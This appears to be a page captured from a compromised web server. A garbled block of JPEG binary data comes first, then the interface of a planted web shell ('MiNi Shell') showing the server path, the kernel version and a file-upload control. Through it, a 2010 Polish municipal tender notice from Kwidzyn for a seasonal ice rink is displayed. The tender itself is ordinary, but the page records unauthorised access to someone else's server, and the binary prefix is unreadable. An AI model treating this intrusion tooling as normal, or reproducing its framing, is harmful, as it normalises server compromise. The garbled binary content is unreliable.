JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101115/368732-N-2010.html

<p class="kh_header"><b>Kwidzyn: Dostawa i montaż lodowiska sezonowego Biały Orlik na terenie kompleksu sportowego powstałego w ramach programu Moje Boisko - Orlik 2012 na Os. Piastowskim w Kwidzynie.</b><br>
<b>Numer ogłoszenia: 368732 - 2010; data zamieszczenia: 15.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kwidzyn , ul. Warszawska 19, 82-500 Kwidzyn, woj. pomorskie, tel. 055 6464700, 6464777, faks 055 6464703.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kwidzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż lodowiska sezonowego Biały Orlik na terenie kompleksu sportowego powstałego w ramach programu Moje Boisko - Orlik 2012 na Os. Piastowskim w Kwidzynie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż lodowiska sezonowego Biały Orlik na terenie kompleksu sportowego powstałego w ramach programu Moje Boisko - Orlik 2012 na Os. Piastowskim w Kwidzynie.
4.1.	Informacje podstawowe
Przedmiot  zamówienia obejmuje :
1)	dostawę i montaż przez Wykonawcę na rzecz Zamawiającego kompletnego lodowiska przenośnego wraz z wyposażeniem, wykonanego w technologii EPDM wraz z agregatem chłodniczym, gwarantującym utrzymanie tafli lodowej grubości 5-7 cm, kontenerem na rolbę, rozbudowę istniejącego oświetlenia, budowę przyłącza kablowego 0,4 kV, dokonanie pierwszego montażu i rozruchu lodowiska a także pierwszego demontażu lodowiska zgodnie z § 4 pkt. 1 wzoru umowy, 
2)	w zakres przedmiotu zamówienia wchodzi ponadto przeprowadzenie instruktażu (w tym przekazanie niezbędnych instrukcji obsługi urządzeń), przeszkolenie pracowników wskazanych przez Zamawiającego,
3)	miejscem dostawy jest boisko wielofunkcyjne o nawierzchni poliuretanowej zlokalizowane w kompleksie sportowym wykonanym w ramach programu Moje Boisko - ORLIK 2012 w na Osiedlu Piastowskim w Kwidzynie,
4)	Charakterystyka obiektu:  
4.1 PARAMETRY TECHNICZNE:
Moduł kontenerowy - garaż na rolbę:
-	Powierzchnia posadowienia:                     -               17,56 m2
-	Powierzchnia użytkowa                            -               15,74 m2
-	Kubatura                                                  -              36,50 m3
-	Długość                                                    -                6,055 m
-	Szerokość                                                 -                2,90 m
-	Wysokość                                                 -                3,36 m
		
Moduł kontenerowy - agregat:
-	Powierzchnia posadowienia:                      -               8,39 m2
-	Kubatura                                                  -             17,42 m3
-	Długość                                                    -               3,80 m
-	Szerokość                                                 -               2,21 m
-	Wysokość                                                 -               2,075 m

Powierzchna użytkowania:
- lodowisko, garaż, agregat                                                            - 552,95 m2    
- dojazd dla rolby, komunikacja, strefa wejścia / wyjścia                -   80,0 m2         
                                                                                                  
                                                                                              Suma - 632,95 m2
Powierzchnia posadowienia obiektu:                 
-  lodowisko z kolektorami, komunikacja, garaż, agregat na terenie ogrodzonym          
                                                                                                 
                                                                                                    suma: - 803,0 m2
Dane konstrukcyjno-materiałowe lodowiska:
Sztuczne lodowisko ma wymiary 17x31m, ograniczone z wszystkich stron bandami o wysokości min. 110cm.

4.1.1 Konstrukcja płyty lodowiska:
- warstwa lodu 5-7cm
- orurowanie płyty chłodniczej EPDM
- folia izolacyjna - 0,5mm
- styropian EPS 100- 5cm
- folia izolacyjna - 0,5mm
- istniejąca nawierzchnia boiska Orlik 2010
System lodowiska do wykorzystania w formie lodowiska przenośnego.

4.2 Dane techniczne lodowiska i jego elementów:
4.2.1 Agregat chłodniczy z zainstalowaną pompą ciepła w celu szybkiego rozmrażania tafli lodowiska o następujących parametrach:
Agregat obudowany - kontenerowy o mocy chłodniczej min. 130 kW przy temperaturze powietrza zewnętrznego 
+ 15 C i prędkości wiatru 1 ms . Temperatura glikolu wej-wyj = -8-11 C . Agregat napełniony wsadem roboczym czynnika chłodniczego R 404 A  . Agregat wyposażony w system pompy ciepła  w celu podgrzania glikolu do temperatury = + 20 C .  
Agregat wyposażony w dwie sprężarki semihermetyczne z minimum dwustopniową regulacją wydajności na każdej ze sprężarek , dodatkowo sprężarki wyposażone w system odciążenia rozruchu. Wymiennik płaszczowo rurowy dwu obiegowy. Sekcja skraplania wyposażona w dwa panele po jednym dla każdego obwody  chłodniczego  . Wentylatory z płynna regulacją wydajności o obniżonym poziomie hałasu , panele skraplacza zabezpieczone siatką ochronną . Agregat wyposażony w pompę obiegową z płynną regulacją przepływu wyposażona w  system zaworów i filtrów mechanicznych , moduł hydrauliczny wyposażony w zbiornik przeponowy . System sterowania realizowany przez sterownik elektroniczny , zamontowany w szafie sterowniczej w sposób uniemożliwiający dostęp osób niepowołanych z możliwością zmiany parametrów temperaturowych glikolu. System sterowania powinien mieć możliwość automatycznego wyłączenia agregatu gdy temperatura zewnętrzną spadnie poniżej zadanej temperatury wyjściowej glikolu i ponownego załączenia gdy temperatura wzrośnie. Szafa sterownicza wyposażona w system oświetlenia wewnętrznego. W celu ograniczenia możliwości kondensacji wilgoci szafa wyposażona w system grzania .  Agregat wyposażony w czujnik przepływu glikolu.
Agregat chłodniczy musi być nowy i posiadać oznakowanie CE zgodnie z obowiązującymi przepisami lub oznaczony znakiem budowlanym, zgodnie z art. 5 ust. 1 ustawy z dn.16-04-2004 r. o wyrobach budowlanych (Dz. U. Nr 92 poz. 881).
Agregat jest przeznaczony do posadowienia na zewnątrz (tzw. wersja KOMPAKT)
Wymagane jest wykonanie ogrodzenia z siatki o wysokości 1,50 na słupkach o rozstawie 2,1 m z rur stalowych o średnicy 70 mm. Wrota typowe o szerokości 2,50 m z siatki o wys.1,50 m. Ogrodzenie obejmuje teren wokół usytuowanego agregatu i konteneru na rolbę. 

4.2.2 Kompletny fabrycznie nowy system ziębniczy tafli lodowiska o wymiarach: 17 x 31 m  ; 
- długość pojedynczego modułu 1,00- 2,00 m; 
-  kolektory zasilające winny pracować w układzie Tischelmana; 
-  odległość (podziałka) pomiędzy osiami sąsiednich przewodów ziębniczych nie może być większa niż 20mm dla zapewnienia krótkiej drogi wymiany ciepła i równomiernej temperatury lodu; 
- przewody ziębnicze muszą być wykonane z odpowiedniej gumy EPDM lub materiału zapewniającego brak falowania po rozłożeniu na planowanej powierzchni oraz
muszą mieć możliwość zwinięcia po zakończonym sezonie w kręgi o małej średnicy max 80 cm dla zapewnienia łatwości transportu i magazynowania po sezonie; Nie dopuszcza się zastosowania przewodów ziębniczych wykonanych z materiału wykazującego tendencje do falowania i powodujących potrzebę budowania i utrzymywania tafli lodu o nadmiernej grubości; 
- kolektory zasilające muszą być zabudowane w sztywnej ramie stalowej, dodatkowo obudowanej blachą w celu zabezpieczenia ich przed uszkodzeniem i dostępem osób niepowołanych; 
-  cały modułowy system ziębniczy tafli lodowiska (a nie jego poszczególne elementy) musi posiadać certyfikat CE lub deklarację zgodności producenta; UWAGA: Zamawiający wymaga, aby Wykonawca załączył do oferty dane techniczne oraz rysunki systemu.
Lodowisko ma być posadowione na istniejącym podłożu poliuretanowym w kompleksie Moje boisko - Orlik 2012
System orurowania ziębniczego powinien być wykonany z nowych elementów: pod orurowaniem winna być ułożona warstwa izolacyjna zabezpieczająca przed przemarzaniem do gruntu. Izolację należy wykonać z foli budowlanej o grubości min. 0,5mm oraz styroduru min. EPS100 o grubości min. 5cm.
Lodowisko powinno prawidłowo funkcjonować w temperaturze powietrza do +10C oraz prędkości wiatru do 1m/s przy promieniowaniu słonecznym rozproszonym.
- bandy okalające taflę lodowiska winny być wykonane ze stali ocynkowanej ogniowo, z wypełnieniem z płyt PE o grubości min. 6 mm w kolorze do uzgodnienia z użytkownikiem, nie wymagające kotwienia do podłoża, wysokości min. 1,2 m, promień w narożnikach bandy min. 4,5 m, dwie bramki wejściowa i wyjściowa o szerokości min 1,0m oraz bramę wyjazdową dla Rolby o szerokości ok. 3,0m. Bandy łatwe w montażu i demontażu zajmujące małą powierzchnię przy składowaniu. 
- roztwór glikolu etylenowego 35% w ilości wymaganej do napełnienia instalacji lodowiska, z pojemnikami do jego magazynowania oraz przenośną pompą do wypompowania glikolu z układu do pojemników. Wykonawca zapewni w okresie gwarancji glikol w niezbędnej ilości do uzupełnienia w przypadku wystąpienia wycieków.

4.3	Obowiązkiem Wykonawcy będzie wytworzenie pierwszej warstwy lodu oraz przeszkolenie obsługi lodowiska.
4.4	Na dostarczone materiały i urządzenia Wykonawca udzieli gwarancji na okres nie krótszy niż 36 miesięcy licząc od daty odbioru obiektu.
4.5	Próba ciśnieniowa przeprowadzana jest przy 3 barach przy użyciu powietrza przez jedną godzinę.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.11-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium w niniejszym postępowaniu wynosi 10.000,00 zł. Zamawiający żąda wniesienia wadium w pełnej wysokości przed terminem do składania ofert.
Wadium przetargowe należy wnieść do Zamawiającego w jednej lub kilku następujących formach: 
pieniądzu (przelewem na rachunek bankowy Zamawiającego w Powiślańskim Banku Spółdzielczym w Kwidzynie nr 11 8300 0009 0008 2107 2000 0040),
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.
Wadium wpłacone w pieniądzu Zamawiający przechowuje na rachunku bankowym. Wadium wniesione w pieniądzu Zamawiający zwraca wraz z odsetkami wynikającymi z umowy rachunku bankowego, pomniejszonymi o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wskazany przez Wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww warunek, jeżeli wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie  wykonał, a w przypadku  świadczeń okresowych lub ciągłych również wykonuje co najmniej 1 dostawę odpowiadającą swoim rodzajem dostawie stanowiącej przedmiot zamówienia, której należyte wykonanie zostało potwierdzone przez poprzednich Zamawiających- Zleceniodawców (np. referencjami).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten może być spełniony      
łącznie; 
Przez dostawę odpowiadającą rodzajem i wartością przedmiotowi zamówienia rozumie się dostawę o następującym zakresie minimalnym: co najmniej 1 dostawę, której przedmiotem była dostawa lodowiska demontowalnego o powierzchni min. 500 m2.
Uwaga! Jeżeli zakres dostaw przedstawionych w wykazie jest szerszy od powyżej określonego przez Zamawiającego należy w wykazie podać zakres dostaw odpowiadających zakresowi przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww warunek jeżeli wykaże, iż dysponuje osobami posiadającymi uprawnienia budowlane do kierowania robotami w branżach: konstrukcyjno-budowlanej oraz instalacji i urządzeń elektrycznych przynależącymi do właściwej dla danej specjalności Izby Samorządu Zawodowego ewentualnie do branżowej Izby Inżynierów Budownictwa.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten może być spełniony      
łącznie; 
Wykonawcy z innych państw członkowskich UE mogą spełnić ten warunek składając dowód na posiadanie równoważnych do ww. uprawnień uzyskanych w swoich krajach pochodzenia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww warunek jeżeli wykaże, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, w wysokości nie mniejszej niż 100.000,00 zł;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany w niżej wymienionych przypadkach:
1). zmiany terminu realizacji:
a) z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach; 
b) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron;
c) z powodu uzasadnionych zmian w zakresie sposobu wykonywania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
d) z powodu niekorzystnych warunków atmosferycznych, które uniemożliwiają realizację przedmiotu umowy zgodnie z obowiązującymi przepisami (warunkami technicznymi - normami);
e) z powodu zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacja finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kwidzyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kwidzynie
ul. Warszawska 19, 82-500 Kwidzyn
Pokój 312 II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2010 godzina 10:00, miejsce: Urząd Miejski w Kwidzynie
ul. Warszawska 19, 82-500 Kwidzyn
Pokój 310 II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com